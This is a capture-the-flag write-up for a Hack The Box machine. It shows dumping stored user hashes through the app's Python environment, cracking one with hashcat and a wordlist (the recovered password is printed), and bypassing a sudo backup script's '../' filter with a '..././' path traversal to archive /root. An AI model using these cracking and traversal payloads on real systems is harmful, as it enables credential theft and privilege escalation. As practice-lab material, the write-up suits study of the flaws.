Code - Hack The Box Machine

May 2025

User Flag

On the environment, running a:

print([u.__dict__ for u in User.query.all()])

We get

[{'_sa_instance_state': <sqlalchemy.orm.state.InstanceState object at 0x7f5033c74520>, 'id': 1, 'username': 'development', 'password': '759b74ce43947f5f4c91aeddc3e5bad3'}, {'_sa_instance_state': <sqlalchemy.orm.state.InstanceState object at 0x7f5033c74580>, 'id': 2, 'username': 'martin', 'password': '3de6f30c4a09c27fc71932bfc68474be'}]

Running a simple hashcat for the martin user:

hashcat -a 0 -m 0 hash.txt ~/wordlists/passwords/rockyou.txt

We get the password:

3de6f30c4a09c27fc71932bfc68474be:nafeelswordsmaster

{
  "destination": "/home/martin/",
  "multiprocessing": true,
  "verbose_log": true,
  "directories_to_archive": [
    "/home/app-production"
  ]
}

Running

sudo /usr/bin/backy.sh /home/martin/pelele.json

We get the /home/app-production directory in the tar file where there is the user.txt file with the first flag.

Root Flag

We can use the same script but now for the root.

If we simply set:

{
  "destination": "/home/martin/",
  "multiprocessing": true,
  "verbose_log": true,
  "directories_to_archive": [
    "/root"
  ]
}

We get this error

Error: /root is not allowed. Only directories under /var/ and /home/ are allowed.

I tried to put the directory as /home/../root but the script removes all ../ occurrences.

Wel, if it does... Let's just do this:

{
  "destination": "/home/martin/",
  "multiprocessing": true,
  "verbose_log": true,
  "directories_to_archive": [
    "/home/..././root"
  ]
}

Bingo.

We got the /root directory on the tar file and got the final flag.